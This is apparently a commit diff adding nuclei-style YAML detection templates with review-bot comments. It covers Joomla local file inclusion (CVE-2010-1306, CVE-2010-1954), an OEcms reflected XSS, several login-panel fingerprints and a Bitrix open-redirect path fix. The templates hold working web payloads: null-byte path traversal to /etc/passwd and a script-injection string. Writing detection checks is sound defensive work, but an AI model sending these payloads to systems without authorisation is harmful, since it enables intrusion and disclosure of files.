socketz 2021-08-25 14:33:32 +02:00
commit ed76585ed6
13 changed files with 269 additions and 3 deletions


@ -0,0 +1,27 @@
id: CVE-2010-1306
info:
name: Joomla! Component Picasa 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component 2.0 and 2.0.5 for Joomla! allows remote attackers to read arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12058
- https://www.cvedetails.com/cve/CVE-2010-1306
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
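Review bot: The `%00` suffix on the traversal path means this check only fires where PHP still truncates file paths at a null byte (fixed in PHP 5.3.4), so a clean result does not show that the component is patched. The same applies to the CVE-2010-1954 template in this commit. A comment above the path would record the limitation, e.g. `# relies on null-byte truncation (PHP < 5.3.4); a negative result is not proof of a fix`. The regex matcher also has no explicit `part: body`, unlike other templates in this commit.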


@ -0,0 +1,27 @@
id: CVE-2010-1954
info:
name: Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iNetLanka Multiple root (com_multiroot) component 1.0 and 1.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12287
- https://www.cvedetails.com/cve/CVE-2010-1954
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200


@ -0,0 +1,33 @@
id: CVE-2018-12095
info:
name: OEcms 3.1 - Cross-Site Scripting
author: LogicalHunter
severity: medium
description: A Reflected Cross-Site Scripting web vulnerability has been discovered in the OEcms v3.1 web-application. The vulnerability is located in the mod parameter of info.php.
reference:
- https://www.exploit-db.com/exploits/44895
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12095
- https://cxsecurity.com/issue/WLB-2018060092
tags: cve,cve2018,xss
requests:
- method: GET
path:
- '{{BaseURL}}/cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
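Review bot: The request path hard-codes a `/cms/` prefix, so an OEcms install served from the web root or another directory would not be reached and would be reported clean. If the prefix is intentional, record it with a comment above the path, e.g. `# assumes OEcms is deployed under /cms/; other install paths are not checked`. The two word matchers also place `part:` differently (after `words:` in the first, before it in the second); one order throughout would read more easily.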


@ -2,7 +2,7 @@ id: CVE-2019-15501
info:
name: LSoft ListServ - XSS
author: Borna Nematzadeh
author: LogicalHunter
severity: medium
reference:
- https://www.exploit-db.com/exploits/47302


@ -2,7 +2,7 @@ id: CVE-2019-8937
info:
name: HotelDruid 2.3.0 - XSS
author: Borna Nematzadeh
author: LogicalHunter
severity: medium
refrense: https://www.exploit-db.com/exploits/46429
tags: cve,cve2019,xss,hoteldruid
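Review bot: The context line `refrense: https://www.exploit-db.com/exploits/46429` misspells the key, so tooling that reads `reference` will likely find no reference for this template. Since the commit already edits this `info` block, it would be worth correcting it to `reference: https://www.exploit-db.com/exploits/46429` in the same change. The rest of the template lies outside the hunk.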


@ -0,0 +1,32 @@
id: epson-unauthorized-access-detect
info:
name: Epson Printer
author: pussycat0x
severity: medium
reference: https://www.exploit-db.com/ghdb/6922
tags: iot,printer,panel,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/PRESENTATION/EPSONCONNECT"
matchers-condition: and
matchers:
- type: word
words:
- "Epson Connect"
- "/IMAGE/EPSONLOGO.PNG"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- "<title>([A-Z-0-9]+) Series</title>"
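Review bot: `severity: medium` and the `unauth` tag claim an access-control finding, but the matchers only confirm that `/PRESENTATION/EPSONCONNECT` renders with Epson branding, and there is no `description` saying what is exposed without authentication. Add a `description:` line stating what the page allows, or lower the severity to `info` as in `epson-web-control-detect`. That template shares the same `name: Epson Printer`, so the two produce indistinguishable result titles. In the extractor, `[A-Z-0-9]` has a hyphen between two ranges; `[A-Z0-9-]+` states the intent unambiguously.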


@ -0,0 +1,25 @@
id: epson-web-control-detect
info:
name: Epson Printer
author: pussycat0x
severity: info
reference: https://www.exploit-db.com/ghdb/6873
tags: iot,printer,panel,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/home"
matchers-condition: and
matchers:
- type: word
words:
- "Epson Web Control"
- "Basic Control"
- "Advanced"
condition: and
- type: status
status:
- 200


@ -0,0 +1,23 @@
id: honeywell-web-controller
info:
name: Honeywell XL Web Controller
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7130
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}/standard/default.php'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Honeywell XL Web Controller</title>'
- type: status
status:
- 200


@ -0,0 +1,23 @@
id: ibm-note-login
info:
name: IBM iNotes Login
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7122
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/names.nsf'
matchers-condition: and
matchers:
- type: word
words:
- '<title>IBM iNotes Login</title>'
- type: status
status:
- 200
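Review bot: With two entries under `path` and no `stop-at-first-match`, a host that serves the login page at both `{{BaseURL}}` and `/names.nsf` is reported twice. Adding `stop-at-first-match: true` to the request would avoid the duplicate; the same applies to `lacie-panel` in this commit. The id `ibm-note-login` also differs from the product spelling `iNotes` used in `name`, which makes the template harder to find by id.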


@ -0,0 +1,31 @@
id: lacie-panel
info:
name: LaCie Login Panel
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7118
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}'
- '{{BaseURL}}/dashboard/'
matchers-condition: and
matchers:
- type: word
words:
- 'id_LaCie'
part: body
- type: regex
regex:
- '(?m)<title>([a-zA-Z0-9&#; ]|)+Dashboard<\/title>$'
part: body
- type: status
status:
- 200
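Review bot: The title regex ends with `$` under `(?m)`, which in Go's regexp matches only directly before `\n`, so a response with CRLF line endings, or with anything after `</title>` on the same line, will not match. The group `([a-zA-Z0-9&#; ]|)+` also carries an empty alternative that adds nothing over a plain `*`. `- '<title>[a-zA-Z0-9&#; ]*Dashboard</title>'` keeps the intent without either problem.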


@ -0,0 +1,22 @@
id: web-service-panel
info:
name: WEB SERVICE Panel
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7116
tags: panel
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>WEB SERVICE</title>'
- type: status
status:
- 200
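Review bot: `<title>WEB SERVICE</title>` at the site root is the only content check and it names no vendor, so any page with that generic title is reported as this panel. Neither `name` nor the rest of the template says which product is meant. Add a `description:` naming the product behind the GHDB reference, plus a second `words` entry specific to it, combined with `condition: and`.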


@ -0,0 +1,23 @@
id: synology-web-station
info:
name: Synology Web Station
author: dhiyaneshDK
severity: info
reference: https://www.exploit-db.com/ghdb/7125
tags: tech
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers-condition: and
matchers:
- type: word
words:
- '<title>Hello! Welcome to Synology Web Station!</title>'
- type: status
status:
- 200


@ -21,7 +21,7 @@ requests:
- '{{BaseURL}}/bitrix/rk.php?id=84&site_id=n1&event1=banner&event2=click&event3=1+%2F+%5B84%5D+%5BMOBILE_HOME%5D+Love+Card&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=691&site_id=s3&event1=banner&event2=click&event3=1+%2F+%5B691%5D+%5BNEW_INDEX_BANNERS%5D+Trade-in+football&goto=https://example.com'
- '{{BaseURL}}/bitrix/rk.php?id=129&event1=banner&event2=click&event3=5+%2F+%5B129%5D+%5BGARMIN_AKCII%5D+Garmin+%E1%EE%ED%F3%F1+%ED%EE%E2%EE%F1%F2%FC+%E2+%E0%EA%F6%E8%E8&goto=https://example.com'
- '{{BaseURL}}bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
- '{{BaseURL}}/bitrix/redirect.php?event1=%D0%A1%D0%BF%D0%B5%D1%86%D0%B8%D0%B0%D0%BB%D1%8C%D0%BD%D1%8B%D0%B5+%D0%B4%D0%BE%D0%BA%D0%BB%D0%B0%D0%B4%D1%8B&event2=&event3=download&goto=https://example.com'
matchers-condition: and
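Review bot: After the leading slash is restored, the corrected `redirect.php` entry appears to be identical to the entry that follows it in the `path` list, so the template would send the same request twice. If the two lines are indeed the same on the new side, drop one of them. The `path` list begins and the matchers end outside this hunk.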